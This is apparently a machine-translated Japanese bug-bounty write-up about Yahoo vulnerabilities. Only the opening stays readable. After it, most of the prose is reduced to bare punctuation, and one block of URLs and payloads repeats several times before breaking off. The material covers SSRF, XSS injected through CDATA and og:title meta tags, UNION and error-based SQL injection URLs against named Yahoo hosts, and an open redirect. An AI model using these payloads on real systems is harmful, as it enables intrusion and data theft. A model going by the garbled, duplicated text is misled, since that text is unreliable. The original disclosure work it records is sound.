三百九十四ドル

この記事では、ヤフーからの報酬プログラムへの参加経験を（そしてそれだけではなく）共有したいと思います。 私が見つけた脆弱性、私が遭遇した困難、そしてヤフーがどれほど寛大であったかをお話しします。 カットの下であなたを待っています！









私はかなり長い間（2007年以降）情報セキュリティの問題に興味を持っています。 私が従おうとしている私の内なる決定は、私の趣味です。 というのも、私はそのようなアドレナリンラッシュをもたらすルーチンになりたくないからです。 しかし、趣味は異なる場合があります。 そして一年弱前に、私は地下を離れることにした。 PHDIIIに行きました。 彼は、競争「WAFバイパス」で名誉ある4位を獲得しました。 私の意見では、このコンテストで少なくとも1つのキーを送信したのは4番目で最後の人物だったからです。 彼は、Symantec Cyber​​ Readiness Challengeのオンラインおよびオフラインのステージに参加しました。彼は驚いたことに、トップ10にいました。 一般的に、彼は自分自身を見せて、賢い人を見ました。 しかし、これはすべて、マズローのニーズのピラミッドの第4段階の満足です。 そして、私は、生きている人のように、食べたいです。 そして、私の趣味が喜びだけでなくお金ももたらすという根底にある欲求は、強迫観念になりました。



Sergey belove Favoritesの投稿を読んだ後、ターニングポイントが発生しました：ITセキュリティのリンク 。 明らかなことに出会ったところで、なんらかの理由で、自分が何を検索すべきか推測できませんでした-オープンプログラムのリストへのリンクBug Bounty。 ここでは、Yandex、Google、Facebookの明白なプログラムに加えて、他の多くのプログラムがリストされていました。 読み取り-完了。



まず、アメリカの電話と公衆電話からプロモーションプログラムを選びました。 眠れない2週間は、私には思えたが、無駄ではなかった。 さまざまな重要度のサービスのSQLi、すべてのユーザーのパスワード変更など、約30のエラーメッセージ。 しかし、2週間の半自動応答の後、「聞いた。 あなたはまもなく連絡されます、「私は思ったが、「どれくらい」はどれくらいですか？ 私はフォーラムをさまようと不快な状況が迫っていた。 彼らは長い間答えます、すっごく長いです。 5,000ドルの一番上のバーが示されると、純粋なペニーが支払われます。 そして一般的に、コミュニティはこのインセンティブプログラムについて非常に否定的な意見を持っています。 この瞬間、私のラップトップは現在の稼働時間で燃え尽きましたが、バックアップしませんでした。 私はこれを運命のしるしとして受け止め、「フィードバックを見ずにレポートを送信し続けるのに寝すぎなかった」という強い意思を決定しました。現時点では、状況はそれほど悪くなく、彼らは9つの脆弱性を確認しました。 確かに、選択はまったく明白ではありません-日付の広がり、臨界レベルの広がり。 そして、最も重要なことは、今、宝くじが私を待っています-お金は四半期のトップ10だけを支払うでしょう。 残りは感謝を言うだけです。 確認されたこれらのエラーのステータスも完全に不明であるため、現時点ではこれ以上言えません。



しかし戻ってみましょう-11月中旬はちょうど庭にありました。 そして、私は新しい犠牲者を探していました。 そのようなプログラムに参加することへの私の関心は、 Telekom.deからの応答によって促進され、脆弱性を報告してくれたことに感謝しました。 そして、私のメッセージが繰り返されたという事実にもかかわらず、彼らは本当に努力のために私に50ユーロを送りたいと思っており、私からの詳細を待っています。







そして、「Yahooはセキュリティ部門のディレクターへのTシャツの送金を停止し、報酬プログラムを正式に開始します」という一般的な見出しで、つぶやき、投稿、いいねの集中砲火に遭遇しました。 2013年11月1日にオープンしたインセンティブプログラムへのリンクをすぐに見つけました。 2014年2月1日以降、彼らはHackerOneと協力しており、 ここに送信する必要があります 。 私は、一方で大きな検索エンジンが6か月間フリーズしないことを望んでいましたが、もう一方では、開始時にクリームを取り除くことができます。 すぐに言わなければならない-私の期待は満たされました。 順番に。



最初の数日間は、科学的な突く方法に費やしました。 私は自分の経験的な方法を持っています-何を探し、どこを見るか。 はい、ただ見回すだけでした。

パート1 tw.m.yahoo.comのXSS。

巻き取りの4日目に、最初のURL（ http://tw.m.yahoo.com/w/twstock/news_content.php?url=http://tw.stock.yahoo.com/w/news_content/urlに出会いました/d/a/140210/2/49cvs.html&.ts=1384478129&.intl=tw&.lang=zh-hant-tw ）。 最初のテストは、私が正しい方向に進んでいることを示しました。 当然、 urlパラメーターに気付きました。

「たぶんiframe？」と思いました。

しかし、いいえ、それは最もサーバー側のリクエストでした。 仕組み：

1.スクリプトはurlパラメーターを取ります

2.それを要求します。実際にはjsonコンテナです（ http://tw.stock.yahoo.com/w/news_content/url/d/a/140210/2/49cvs.html ）



3.すべてのページを作成します。

すぐに、URLを置き換えるアイデアが生まれました。 そして、別のドメインだけでなく、別のポートにもリクエストを行います。

http://tw.m.yahoo.com/w/twstock/news_content.php?url=http://example.com:6666/nonexist



サーバー側では、次のものが得られます。

nc -lvv 6666 Connection from 202.43.194.189 port 6666 [tcp/ircu-2] accepted GET /nonexist HTTP/1.1 Host: example.com:6666 Accept: */*
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

ヘッダーの点では、CURLと非常によく似ています（後で明らかになるため、CURLOPT_FOLLOWLOCATIONはオフになっています）。 その後、許可されているプロトコルを確認しました。

-仕事：http、https;

-動作しない：ftp、gopher、tftp、ldap、dict、ssh2、file、telnet、smtp、mailto、pop3、imap;

-ロケーション経由のリダイレクトは機能しません。

結果はSSRFの使用で非常に限られています。



次に、賢明な動きは、ソースファイルを保存して要求することでした。

http://tw.m.yahoo.com/w/twstock/news_content.php?url=http://example.com/10555/content_spoofed.html

出来上がり。 コンテンツの代替があります。 しかし、コンテンツの置換がある場合、XSSを達成しようとしないことは罪です。 私はパラメーターを実験し始めましたが、...それらは十分に検証されました。 最初の呼び出しは、 cobrand_urlパラメーターを次のように置き換えることでした：

 javascript:alert('xss')
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

すべてうまくいきましたが、ユーザーからのクリックを期待するのは最良の選択肢ではありません。 レポートでは、裸の女の子、または悲しい猫をイメージとして使用することを提案しましたが。

パラメーターをさらにテストし始め、そのような置き換えを行いました。

 "category":"N10\""
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

（エスケープされた二重引用符）。 非常に予期しないエラースタックトレースが表示されました（残念ながら保存されませんでした）。 結論として、ブループリントの中には、自分がスリップしたものを通常は処理して出力することができないというものがあります。 これは何ですか 初めて見た。 Googleにアクセスすると、魔法の修飾子「 w-raw 」があることがわかります。

http://tw.m.yahoo.com/w-raw/twstock/news_content.php?url=http://tw.stock.yahoo.com/w/news_content/url/d/a/140210/2/ 49cvs.html

これは、出力前にテンプレートのソースコードを示しています（わかりました）。 出力前にデータを収集しようとしたときに何がどのように注がれるかが明らかになりました。 そして、これに加えて、ソースのマークアップを追加することでソースの構造を変更できることが明らかになりました。 それから私はもう少しグーグルで検索し、 w-rawでさまざまなページのソースをもう少し見て、グーグルで検索しました...

 <custom-ad mediatype="text/html"><![ CDATA[<img src='http://csc.beap.bc…… /> ]]></custom-ad>
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

同時に、CDATAの内容は変更されずにページに表示されました。 これがあなたが必要なもののようです。

試行錯誤により、正しいペイロードを見つけました。

 "legal_name":"legal_name<\/block><module><custom-ad mediatype=\"text\/html\"><![CDATA[<img src='asdfasdf' onerror=\"alert('xss')\"><script>alert('xss2')<\/script>]]><\/custom-ad><\/module><block>"
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

両方のベクトルが機能し、実際、 .

, XSS.



. SQLi *.sports.yahoo.com.

.

http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711

. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :

sports.yahoo.com/golf/pga/schedule?season=2013

sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013

sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012

sports.yahoo.com/golf/lpga/schedule?season=2012

sports.yahoo.com/golf/champions/schedule?season=2012

sports.yahoo.com/golf/web.com/schedule?season=2013

sports.yahoo.com/golf/european/schedule?season=2013

sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012

:

sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23

sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013

sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR

sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29

ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting

ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting

ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting

ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0

ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013

ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013

sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29

:

sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013

:

racing.fantasysports.yahoo.com/auto/expertpicks?week=35

racing.fantasysports.yahoo.com/auto/playerdistribution?week=35

(stat1/2):

baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013

football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013

baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1

basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012

basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1

:

- Union select - - , - .

- , USERNAME@%

- @@hostname , 40+ . MySQL. . , . . .

- , year=postseason_2013 information_schema, . , hex, - .



:

racing.fantasysports.yahoo.com/auto/playerdistribution?week=35

UNION SELECT:

http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2

. - , , . , , UNION " - ". :

union select 1, ord(substr(user(),1,1))/100,1





.



:



SQL . .



. Open redirect m.yahoo.com.

m.yahoo.com, ( : dark side of reproduce this bug ), :

Welcome to Yahoo

Thanks for signing in!

It looks like you customized your Home Page before you signed in. What would you like to do?

[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview

"Not sure". POST- :

m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en

Firebug' GET:

m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS

- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :

http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED



, , : " ?!". Yahoo 394 .



. SQLi hk.promotion.yahoo.net.

. , , yahoo.net . , . - . .



, error-based SQLi:

http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928



, . XSS info.yahoo.com.

( ).

http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390



- , . - .



. http https. , , , , meta- og:title og:description . meta- :

<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>





XSS. . XSS, Chrome, .



.

, Yahoo. . . , .



.

finance.yahoo.com. , UNION SELECT SQLi c . :

21.11 -

25.11 -

27.11 - : " , "

27.11 - - .

2.12 - : " , ."

"WTF?!!!" - . .

10.12 - . , , , : ", . ."

, Yahoo XSS SQLi " ":



, , . , , .



, , , , , -10 Yahoo - Wall of Fame .



- : hackerone.com/4lemon .



PS. . . , HackerOne , . - Yahoo 10 .

.

, XSS.



. SQLi *.sports.yahoo.com.

.

http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711

. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :

sports.yahoo.com/golf/pga/schedule?season=2013

sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013

sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012

sports.yahoo.com/golf/lpga/schedule?season=2012

sports.yahoo.com/golf/champions/schedule?season=2012

sports.yahoo.com/golf/web.com/schedule?season=2013

sports.yahoo.com/golf/european/schedule?season=2013

sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012

:

sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23

sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013

sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR

sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29

ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting

ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting

ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting

ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0

ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013

ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013

sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29

:

sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013

:

racing.fantasysports.yahoo.com/auto/expertpicks?week=35

racing.fantasysports.yahoo.com/auto/playerdistribution?week=35

(stat1/2):

baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013

football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013

baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1

basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012

basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1

:

- Union select - - , - .

- , USERNAME@%

- @@hostname , 40+ . MySQL. . , . . .

- , year=postseason_2013 information_schema, . , hex, - .



:

racing.fantasysports.yahoo.com/auto/playerdistribution?week=35

UNION SELECT:

http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2

. - , , . , , UNION " - ". :

union select 1, ord(substr(user(),1,1))/100,1

.



:



SQL . .



. Open redirect m.yahoo.com.

m.yahoo.com, ( : dark side of reproduce this bug ), :

Welcome to Yahoo

Thanks for signing in!

It looks like you customized your Home Page before you signed in. What would you like to do?

[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview

"Not sure". POST- :

m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en

Firebug' GET:

m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS

- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :

http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED



, , : " ?!". Yahoo 394 .



. SQLi hk.promotion.yahoo.net.

. , , yahoo.net . , . - . .



, error-based SQLi:

http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928



, . XSS info.yahoo.com.

( ).

http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390



- , . - .



. http https. , , , , meta- og:title og:description . meta- :

<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>





XSS. . XSS, Chrome, .



.

, Yahoo. . . , .



.

finance.yahoo.com. , UNION SELECT SQLi c . :

21.11 -

25.11 -

27.11 - : " , "

27.11 - - .

2.12 - : " , ."

"WTF?!!!" - . .

10.12 - . , , , : ", . ."

, Yahoo XSS SQLi " ":



, , . , , .



, , , , , -10 Yahoo - Wall of Fame .



- : hackerone.com/4lemon .



PS. . . , HackerOne , . - Yahoo 10 .





.

, XSS.



. SQLi *.sports.yahoo.com.

.

http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711

. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :

sports.yahoo.com/golf/pga/schedule?season=2013

sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013

sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012

sports.yahoo.com/golf/lpga/schedule?season=2012

sports.yahoo.com/golf/champions/schedule?season=2012

sports.yahoo.com/golf/web.com/schedule?season=2013

sports.yahoo.com/golf/european/schedule?season=2013

sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012

:

sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23

sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013

sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR

sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29

ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting

ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting

ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting

ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0

ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013

ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013

sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29

:

sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013

:

racing.fantasysports.yahoo.com/auto/expertpicks?week=35

racing.fantasysports.yahoo.com/auto/playerdistribution?week=35

(stat1/2):

baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013

football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013

baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1

basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012

basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1

:

- Union select - - , - .

- , USERNAME@%

- @@hostname , 40+ . MySQL. . , . . .

- , year=postseason_2013 information_schema, . , hex, - .



:

racing.fantasysports.yahoo.com/auto/playerdistribution?week=35

UNION SELECT:

http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2

. - , , . , , UNION " - ". :

union select 1, ord(substr(user(),1,1))/100,1

.



:



SQL . .



. Open redirect m.yahoo.com.

m.yahoo.com, ( : dark side of reproduce this bug ), :

Welcome to Yahoo

Thanks for signing in!

It looks like you customized your Home Page before you signed in. What would you like to do?

[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview

"Not sure". POST- :

m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en

Firebug' GET:

m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS

- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :

http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED



, , : " ?!". Yahoo 394 .



. SQLi hk.promotion.yahoo.net.

. , , yahoo.net . , . - . .



, error-based SQLi:

http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928



, . XSS info.yahoo.com.

( ).

http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390



- , . - .



. http https. , , , , meta- og:title og:description . meta- :

<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>





XSS. . XSS, Chrome, .



.

, Yahoo. . . , .



.

finance.yahoo.com. , UNION SELECT SQLi c . :

21.11 -

25.11 -

27.11 - : " , "

27.11 - - .

2.12 - : " , ."

"WTF?!!!" - . .

10.12 - . , , , : ", . ."

, Yahoo XSS SQLi " ":



, , . , , .



, , , , , -10 Yahoo - Wall of Fame .



- : hackerone.com/4lemon .



PS. . . , HackerOne , . - Yahoo 10 .





.

, XSS.



. SQLi *.sports.yahoo.com.

.

http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711

. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :

sports.yahoo.com/golf/pga/schedule?season=2013

sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013

sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012

sports.yahoo.com/golf/lpga/schedule?season=2012

sports.yahoo.com/golf/champions/schedule?season=2012

sports.yahoo.com/golf/web.com/schedule?season=2013

sports.yahoo.com/golf/european/schedule?season=2013

sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012

:

sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23

sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013

sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR

sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29

ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting

ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting

ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting

ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0

ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013

ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013

sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29

:

sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013

:

racing.fantasysports.yahoo.com/auto/expertpicks?week=35

racing.fantasysports.yahoo.com/auto/playerdistribution?week=35

(stat1/2):

baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013

football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013

baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1

basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012

basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1

:

- Union select - - , - .

- , USERNAME@%

- @@hostname , 40+ . MySQL. . , . . .

- , year=postseason_2013 information_schema, . , hex, - .



:

racing.fantasysports.yahoo.com/auto/playerdistribution?week=35

UNION SELECT:

http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2

. - , , . , , UNION " - ". :

union select 1, ord(substr(user(),1,1))/100,1

.



:



SQL . .



. Open redirect m.yahoo.com.

m.yahoo.com, ( : dark side of reproduce this bug ), :

Welcome to Yahoo

Thanks for signing in!

It looks like you customized your Home Page before you signed in. What would you like to do?

[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview

"Not sure". POST- :

m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en

Firebug' GET:

m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS

- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :

http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED



, , : " ?!". Yahoo 394 .



. SQLi hk.promotion.yahoo.net.

. , , yahoo.net . , . - . .



, error-based SQLi:

http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928



, . XSS info.yahoo.com.

( ).

http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390



- , . - .



. http https. , , , , meta- og:title og:description . meta- :

<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>





XSS. . XSS, Chrome, .



.

, Yahoo. . . , .



.

finance.yahoo.com. , UNION SELECT SQLi c . :

21.11 -

25.11 -

27.11 - : " , "

27.11 - - .

2.12 - : " , ."

"WTF?!!!" - . .

10.12 - . , , , : ", . ."

, Yahoo XSS SQLi " ":



, , . , , .



, , , , , -10 Yahoo - Wall of Fame .



- : hackerone.com/4lemon .



PS. . . , HackerOne , . - Yahoo 10 .





.

, XSS.



. SQLi *.sports.yahoo.com.

.

http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711

. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :

sports.yahoo.com/golf/pga/schedule?season=2013

sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013

sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012

sports.yahoo.com/golf/lpga/schedule?season=2012

sports.yahoo.com/golf/champions/schedule?season=2012

